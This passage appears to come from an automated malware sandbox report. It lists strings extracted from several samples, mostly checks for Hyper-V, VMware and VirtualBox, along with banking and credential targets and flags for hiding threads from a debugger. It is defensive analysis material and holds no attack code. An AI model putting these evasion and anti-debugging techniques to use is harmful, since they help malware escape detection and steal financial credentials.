Source: explorti.exe, 0000000C.00000002.3236691594.0000000000E5A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWP
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000093C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.00000000008BC000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: DLL_Loader_Marker]DLL_Loader_VirtualMachineZDLL_Loader_Reloc_Unit
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: /Windows 2012 R2 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: )Windows 8 Server Standard without Hyper-V
Source: IDGHDGIDAK.exe, 00000007.00000002.2240671621.0000000000C98000.00000040.00000001.01000000.00000009.sdmp, explorti.exe, 00000009.00000002.2275569410.00000000004E8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000A.00000002.2283494834.00000000004E8000.00000040.00000001.01000000.0000000D.sdmp, explorti.exe, 0000000C.00000002.3235833940.00000000004E8000.00000040.00000001.01000000.0000000D.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (full)
Source: BGIIDAEB.0.dr Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2012 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: VMware
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: $Windows 8.1 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2012 Server Standard without Hyper-V
Source: BGIIDAEB.0.dr Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Microsoft Hyper-V Server
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (core)
Source: BGIIDAEB.0.dr Binary or memory string: global block list test formVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2198516833.0000000001678000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2198516833.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, Wf9qnVcbi8.exe, 00000000.00000002.2198516833.0000000001695000.00000004.00000020.00020000.00000000.sdmp, explorti.exe, 0000000C.00000002.3236691594.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, 528307a0ac.exe, 0000000D.00000002.2717126137.00000000018BE000.00000004.00000020.00020000.00000000.sdmp, 528307a0ac.exe, 0000000D.00000002.2717126137.00000000018CE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Datacenter without Hyper-V (full)
Source: BGIIDAEB.0.dr Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2012 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (core)
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: %Windows 2016 Microsoft Hyper-V Server
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2012 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 11 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 7Windows 2016 Essential Server Solutions without Hyper-V
Source: BGIIDAEB.0.dr Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: +Windows 8.1 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Datacenter without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.5.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.5.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: 528307a0ac.exe, 0000000D.00000002.2717126137.000000000185E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: VMwareVMware
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Enterprise without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.5.dr Binary or memory string: VMware VMCI Bus Device
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 11 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 2016 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (core)
Source: BGIIDAEB.0.dr Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655
Source: Amcache.hve.5.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: :Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: BGIIDAEB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 11 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Standard without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: vmci.syshbin
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Standard without Hyper-V (core)
Source: Amcache.hve.5.dr Binary or memory string: VMware, Inc.
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 5Windows 10 Essential Server Solutions without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: VMware20,1hbin@
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 8Windows 2012 R2 Server Enterprise without Hyper-V (core)
Source: 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: xVBoxService.exe
Source: Amcache.hve.5.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: BGIIDAEB.0.dr Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 3Windows 10 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Enterprise without Hyper-V (full)
Source: Amcache.hve.5.dr Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: BGIIDAEB.0.dr Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Enterprise without Hyper-V (core)
Source: BGIIDAEB.0.dr Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 11 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 R2 Essential Server Solutions without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: ,Windows 2016 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Standard without Hyper-V (core)
Source: BGIIDAEB.0.dr Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: Amcache.hve.5.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Datacenter without Hyper-V (core)
Source: BGIIDAEB.0.dr Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2016 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8 Server Datacenter without Hyper-V (full)
Source: 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VBoxService.exe
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 8.1 Server Standard without Hyper-V
Source: Amcache.hve.5.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: *Windows 10 Server Standard without Hyper-V
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 11 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 1Windows 10 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 2012 Server Datacenter without Hyper-V (full)
Source: 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: VMWare
Source: Amcache.hve.5.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Enterprise without Hyper-V (core)
Source: Wf9qnVcbi8.exe, Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: Windows 10 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8.1 Server Standard without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Datacenter without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 4Windows 8.1 Server Datacenter without Hyper-V (core)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: 2Windows 8 Server Enterprise without Hyper-V (full)
Source: Wf9qnVcbi8.exe, 00000000.00000002.2189641658.000000000080C000.00000040.00000001.01000000.00000003.sdmp, 528307a0ac.exe, 0000000D.00000002.2715962638.000000000078C000.00000040.00000001.01000000.0000000E.sdmp Binary or memory string: #Windows 11 Microsoft Hyper-V Server
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging
barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\Wf9qnVcbi8.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IDGHDGIDAK.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\ad40971b6b\explorti.exe Thread information set: HideFromDebugger Jump to behavior
